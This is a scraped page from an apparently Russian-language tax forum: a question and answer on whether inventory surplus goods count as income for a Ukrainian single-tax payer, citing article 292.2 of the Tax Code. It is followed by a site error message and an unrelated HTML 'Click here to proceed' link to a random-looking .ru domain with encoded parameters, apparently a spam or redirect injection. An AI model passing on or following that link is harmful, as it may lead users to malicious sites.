стоимость избытка товара включается ли к составу доходу?

licka
стоимость избытка товара включается ли к составу доходу?
включается ли составу дохода юридического лица, который является плательщиком Единого налога, стоимость избытка товаров, выявленные по результатам инвентаризации.
09.17.14 2:12
Ответ: anonghost
813-2014-08-21 12:04
если юридическое лицо, которое является плательщиком единого налога во время проведения инвентаризации в отчетном периоде виявило неучтенные товары, покупка которых не подтверждена соответствующими документами, то подобные товары считаются безоплатно полученными и их стоимость учитывается в составе дохода во время начисления единого налога на основании пункта 292.2 статьи 292 Налогового кодекса Украины
09.17.14 2:12
стоимость избытка товара включается ли к составу доходу? | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=pM3%2BmfaFYGa5suQvFik5f3%2BwaT%2FqcRIMpuZx8FbxnpfjXt9lYMYjWiy8hOaDJzF9xqr83Im59xdVE0E2qlMgLuDYJZ80iMmI70KhmVOKNVrrjce%2B%2FKTPh0N8oLfEHAbkH7KKMzZZf%2BQFTOn5NfDqUra0wLzxc0UaCUq0gyVxoks%3D&t=nfrm">Click here to proceed</a>. </body>